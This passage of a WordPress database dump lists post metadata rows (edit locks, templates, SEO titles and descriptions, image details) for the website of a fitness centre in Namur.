(1287, 351, '_su_description', 's:170:\"a:1:{i:0;s:151:\"Unique à Namur, une nouvelle façon de faire du fitness - prix des séances de : Coaching nutritionnel, Personal Training, Duo Training, Team Training\";}\";'),
(1288, 351, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1352, 362, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1351, 361, '_wp_page_template', 'default'),
(1350, 361, '_edit_lock', '1391979177:1'),
(1349, 361, '_edit_last', '1'),
(1348, 360, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1347, 360, '_su_description', 's:170:\"a:1:{i:0;s:151:\"Unique à Namur, une nouvelle façon de faire du fitness - prix des séances de : Coaching nutritionnel, Personal Training, Duo Training, Team Training\";}\";'),
(1295, 352, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1296, 352, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1380963247:1\";}\";'),
(1297, 352, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1298, 352, '_su_title', 's:54:\"a:1:{i:0;s:36:\"Cross Training Center - Les séances\";}\";'),
(1299, 352, '_su_description', 's:170:\"a:1:{i:0;s:151:\"Unique à Namur, une nouvelle façon de faire du fitness - prix des séances de : Coaching nutritionnel, Personal Training, Duo Training, Team Training\";}\";'),
(1300, 352, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1301, 353, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1302, 353, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1380963268:1\";}\";'),
(1303, 353, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1304, 353, '_su_title', 's:54:\"a:1:{i:0;s:36:\"Cross Training Center - Les séances\";}\";'),
(1305, 353, '_su_description', 's:170:\"a:1:{i:0;s:151:\"Unique à Namur, une nouvelle façon de faire du fitness - prix des séances de : Coaching nutritionnel, Personal Training, Duo Training, Team Training\";}\";'),
(1306, 353, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1307, 354, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1308, 354, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1380963317:1\";}\";'),
(1309, 354, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1310, 354, '_su_title', 's:54:\"a:1:{i:0;s:36:\"Cross Training Center - Les séances\";}\";'),
(1311, 354, '_su_description', 's:170:\"a:1:{i:0;s:151:\"Unique à Namur, une nouvelle façon de faire du fitness - prix des séances de : Coaching nutritionnel, Personal Training, Duo Training, Team Training\";}\";'),
(1312, 354, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1346, 360, '_su_title', 's:54:\"a:1:{i:0;s:36:\"Cross Training Center - Les séances\";}\";'),
(1345, 360, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1342, 359, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1343, 360, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1344, 360, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1383585577:1\";}\";'),
(1319, 356, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"2\";}\";'),
(1320, 356, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1381355870:2\";}\";'),
(1321, 356, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1322, 356, '_su_title', 's:54:\"a:1:{i:0;s:36:\"Cross Training Center - Les séances\";}\";'),
(1323, 356, '_su_description', 's:170:\"a:1:{i:0;s:151:\"Unique à Namur, une nouvelle façon de faire du fitness - prix des séances de : Coaching nutritionnel, Personal Training, Duo Training, Team Training\";}\";'),
(1324, 356, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1341, 359, '_su_description', 's:170:\"a:1:{i:0;s:151:\"Unique à Namur, une nouvelle façon de faire du fitness - prix des séances de : Coaching nutritionnel, Personal Training, Duo Training, Team Training\";}\";'),
(1338, 359, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1383585577:1\";}\";'),
(1339, 359, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1340, 359, '_su_title', 's:54:\"a:1:{i:0;s:36:\"Cross Training Center - Les séances\";}\";'),
(1337, 359, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"2\";}\";'),
(1577, 397, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1578, 397, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1579, 398, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1580, 398, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1384464789:1\";}\";'),
(1581, 398, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1582, 398, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1583, 400, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"2\";}\";'),
(1584, 400, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1384467565:2\";}\";'),
(1585, 400, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1586, 400, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1587, 401, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1588, 401, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1385282095:1\";}\";'),
(1589, 401, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1590, 401, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1591, 402, '_wp_attached_file', '2013/05/julie_rogge_pti.jpg'),
(1592, 402, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:198;s:6:\"height\";i:254;s:4:\"file\";s:27:\"2013/05/julie_rogge_pti.jpg\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:27:\"julie_rogge_pti-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post_thumbnail\";a:4:{s:4:\"file\";s:27:\"julie_rogge_pti-198x224.jpg\";s:5:\"width\";i:198;s:6:\"height\";i:224;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:10:{s:8:\"aperture\";d:4.79999999999999982236431605997495353221893310546875;s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:8:\"DMC-TZ30\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";i:1385042766;s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"11\";s:3:\"iso\";s:3:\"500\";s:13:\"shutter_speed\";s:5:\"0.008\";s:5:\"title\";s:0:\"\";}}'),
(1593, 131, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1594, 131, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1385282406:1\";}\";'),
(1595, 131, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1596, 131, '_su_title', 's:51:\"a:1:{i:0;s:33:\"Cross Training Center - L\'équipe\";}\";'),
(1597, 131, '_su_description', 's:177:\"a:1:{i:0;s:158:\"Unique à Namur, une nouvelle façon de faire du fitness. Julie Pierrard, Damien Pierrard, Guélor Luabeya, Matthieu Gille, Bertrand Bauwin, Julien Meulemans.\";}\";'),
(1598, 131, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1599, 403, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1600, 403, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1385282421:1\";}\";'),
(1601, 403, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1602, 403, '_su_title', 's:51:\"a:1:{i:0;s:33:\"Cross Training Center - L\'équipe\";}\";'),
(1603, 403, '_su_description', 's:177:\"a:1:{i:0;s:158:\"Unique à Namur, une nouvelle façon de faire du fitness. Julie Pierrard, Damien Pierrard, Guélor Luabeya, Matthieu Gille, Bertrand Bauwin, Julien Meulemans.\";}\";'),
(1604, 403, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1605, 404, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1606, 404, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1385282470:1\";}\";'),
(1607, 404, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1608, 404, '_su_title', 's:51:\"a:1:{i:0;s:33:\"Cross Training Center - L\'équipe\";}\";'),
(1609, 404, '_su_description', 's:177:\"a:1:{i:0;s:158:\"Unique à Namur, une nouvelle façon de faire du fitness. Julie Pierrard, Damien Pierrard, Guélor Luabeya, Matthieu Gille, Bertrand Bauwin, Julien Meulemans.\";}\";'),
(1610, 404, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1611, 406, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1612, 406, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1390070977:1\";}\";'),
(1613, 406, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1614, 406, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1615, 406, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1616, 406, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1390071037:1\";}\";'),
(1617, 406, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1618, 406, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1619, 406, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1620, 406, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1390071112:1\";}\";'),
(1621, 406, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1622, 406, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1623, 407, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1624, 407, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1390071143:1\";}\";'),
(1625, 407, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1626, 407, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1627, 406, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1628, 406, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1390071322:1\";}\";'),
(1629, 406, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1630, 406, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1631, 408, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1632, 408, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1390071336:1\";}\";'),
(1633, 408, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1634, 408, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";');
INSERT INTO `www2_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(1635, 409, '_wp_attached_file', '2013/11/zumba3.jpg'),
(1636, 409, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:70;s:6:\"height\";i:24;s:4:\"file\";s:18:\"2013/11/zumba3.jpg\";s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:10:{s:8:\"aperture\";i:0;s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";i:0;s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";i:0;s:3:\"iso\";i:0;s:13:\"shutter_speed\";i:0;s:5:\"title\";s:0:\"\";}}'),
(1637, 410, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1638, 410, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1390071559:1\";}\";'),
(1639, 410, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1640, 410, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1641, 411, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1642, 411, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1390071609:1\";}\";'),
(1643, 411, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1644, 411, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1645, 406, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1646, 406, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1390071667:1\";}\";'),
(1647, 406, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1648, 406, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1649, 412, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1650, 412, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1390071697:1\";}\";'),
(1651, 412, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1652, 412, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1653, 406, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1654, 406, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1390071757:1\";}\";'),
(1655, 406, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1656, 406, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1657, 406, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1658, 406, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1390071817:1\";}\";'),
(1659, 406, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1660, 406, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1661, 413, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1662, 413, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1390071847:1\";}\";'),
(1663, 413, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1664, 413, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1665, 414, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1666, 414, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1390071910:1\";}\";'),
(1667, 414, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1668, 414, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1669, 406, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1670, 406, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1390071970:1\";}\";'),
(1671, 406, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1672, 406, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1673, 415, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1674, 415, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1390072030:1\";}\";'),
(1675, 415, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1676, 415, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1677, 416, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1678, 416, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1390072053:1\";}\";'),
(1679, 416, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1680, 416, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1681, 417, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1682, 417, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1390072088:1\";}\";'),
(1683, 417, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1684, 417, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1685, 418, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1686, 418, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1390072133:1\";}\";'),
(1687, 418, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1688, 418, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1689, 419, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1690, 419, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1390072299:1\";}\";'),
(1691, 419, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1692, 419, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1693, 131, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1694, 131, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1390250108:1\";}\";'),
(1695, 131, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1696, 131, '_su_title', 's:51:\"a:1:{i:0;s:33:\"Cross Training Center - L\'équipe\";}\";'),
(1697, 131, '_su_description', 's:177:\"a:1:{i:0;s:158:\"Unique à Namur, une nouvelle façon de faire du fitness. Julie Pierrard, Damien Pierrard, Guélor Luabeya, Matthieu Gille, Bertrand Bauwin, Julien Meulemans.\";}\";'),
(1698, 131, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1699, 131, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1700, 131, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1390250160:1\";}\";'),
(1701, 131, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1702, 131, '_su_title', 's:51:\"a:1:{i:0;s:33:\"Cross Training Center - L\'équipe\";}\";'),
(1703, 131, '_su_description', 's:177:\"a:1:{i:0;s:158:\"Unique à Namur, une nouvelle façon de faire du fitness. Julie Pierrard, Damien Pierrard, Guélor Luabeya, Matthieu Gille, Bertrand Bauwin, Julien Meulemans.\";}\";'),
(1704, 131, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1705, 131, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1706, 131, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1390250222:1\";}\";'),
(1707, 131, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1708, 131, '_su_title', 's:51:\"a:1:{i:0;s:33:\"Cross Training Center - L\'équipe\";}\";'),
(1709, 131, '_su_description', 's:177:\"a:1:{i:0;s:158:\"Unique à Namur, une nouvelle façon de faire du fitness. Julie Pierrard, Damien Pierrard, Guélor Luabeya, Matthieu Gille, Bertrand Bauwin, Julien Meulemans.\";}\";'),
(1710, 131, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1711, 420, '_wp_attached_file', '2013/05/youssra_boujat_pti.jpg'),
(1712, 420, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:198;s:6:\"height\";i:258;s:4:\"file\";s:30:\"2013/05/youssra_boujat_pti.jpg\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"youssra_boujat_pti-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post_thumbnail\";a:4:{s:4:\"file\";s:30:\"youssra_boujat_pti-198x224.jpg\";s:5:\"width\";i:198;s:6:\"height\";i:224;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:10:{s:8:\"aperture\";i:0;s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";i:0;s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";i:0;s:3:\"iso\";i:0;s:13:\"shutter_speed\";i:0;s:5:\"title\";s:0:\"\";}}'),
(1713, 131, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1714, 131, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1390250283:1\";}\";'),
(1715, 131, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1716, 131, '_su_title', 's:51:\"a:1:{i:0;s:33:\"Cross Training Center - L\'équipe\";}\";'),
(1717, 131, '_su_description', 's:177:\"a:1:{i:0;s:158:\"Unique à Namur, une nouvelle façon de faire du fitness. Julie Pierrard, Damien Pierrard, Guélor Luabeya, Matthieu Gille, Bertrand Bauwin, Julien Meulemans.\";}\";'),
(1718, 131, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1719, 421, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1720, 421, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1390250296:1\";}\";'),
(1721, 421, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1722, 421, '_su_title', 's:51:\"a:1:{i:0;s:33:\"Cross Training Center - L\'équipe\";}\";'),
(1723, 421, '_su_description', 's:177:\"a:1:{i:0;s:158:\"Unique à Namur, une nouvelle façon de faire du fitness. Julie Pierrard, Damien Pierrard, Guélor Luabeya, Matthieu Gille, Bertrand Bauwin, Julien Meulemans.\";}\";'),
(1724, 421, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1725, 422, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1726, 422, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1390250362:1\";}\";'),
(1727, 422, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1728, 422, '_su_title', 's:51:\"a:1:{i:0;s:33:\"Cross Training Center - L\'équipe\";}\";'),
(1729, 422, '_su_description', 's:177:\"a:1:{i:0;s:158:\"Unique à Namur, une nouvelle façon de faire du fitness. Julie Pierrard, Damien Pierrard, Guélor Luabeya, Matthieu Gille, Bertrand Bauwin, Julien Meulemans.\";}\";'),
(1730, 422, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1731, 423, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1732, 423, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1390250403:1\";}\";'),
(1733, 423, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1734, 423, '_su_title', 's:51:\"a:1:{i:0;s:33:\"Cross Training Center - L\'équipe\";}\";'),
(1735, 423, '_su_description', 's:177:\"a:1:{i:0;s:158:\"Unique à Namur, une nouvelle façon de faire du fitness. Julie Pierrard, Damien Pierrard, Guélor Luabeya, Matthieu Gille, Bertrand Bauwin, Julien Meulemans.\";}\";'),
(1736, 423, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1737, 142, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1738, 142, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1391977485:1\";}\";'),
(1739, 142, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1740, 142, '_su_title', 's:49:\"a:1:{i:0;s:31:\"Cross Training Center - Contact\";}\";'),
(1741, 142, '_su_description', 's:138:\"a:1:{i:0;s:119:\"Unique à Namur, une nouvelle façon de faire du fitness. Bowling et Squash de Namur Chaussée de Perwez 251 5002 Namur\";}\";'),
(1742, 142, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1743, 142, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1744, 142, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1391977545:1\";}\";'),
(1745, 142, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1746, 142, '_su_title', 's:49:\"a:1:{i:0;s:31:\"Cross Training Center - Contact\";}\";'),
(1747, 142, '_su_description', 's:138:\"a:1:{i:0;s:119:\"Unique à Namur, une nouvelle façon de faire du fitness. Bowling et Squash de Namur Chaussée de Perwez 251 5002 Namur\";}\";'),
(1748, 142, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1749, 425, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1750, 425, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1391977560:1\";}\";'),
(1751, 425, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1752, 425, '_su_title', 's:49:\"a:1:{i:0;s:31:\"Cross Training Center - Contact\";}\";'),
(1753, 425, '_su_description', 's:138:\"a:1:{i:0;s:119:\"Unique à Namur, une nouvelle façon de faire du fitness. Bowling et Squash de Namur Chaussée de Perwez 251 5002 Namur\";}\";'),
(1754, 425, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1755, 387, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1756, 387, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1391977761:1\";}\";'),
(1757, 387, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1758, 387, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1759, 426, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1760, 426, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1391977776:1\";}\";'),
(1761, 426, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1762, 426, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1763, 387, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1764, 387, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1391977840:1\";}\";'),
(1765, 387, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1766, 387, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1767, 427, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1768, 427, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1391977854:1\";}\";'),
(1769, 427, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1770, 427, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1771, 387, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1772, 387, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1391977914:1\";}\";'),
(1773, 387, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1774, 387, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1775, 428, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1776, 428, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1391977973:1\";}\";'),
(1777, 428, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1778, 428, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1779, 387, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1780, 387, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1391978122:1\";}\";'),
(1781, 387, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1782, 387, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1783, 387, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1784, 387, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1391978167:1\";}\";'),
(1785, 387, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1786, 387, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1787, 429, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1788, 429, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1391978182:1\";}\";'),
(1789, 429, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1790, 429, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
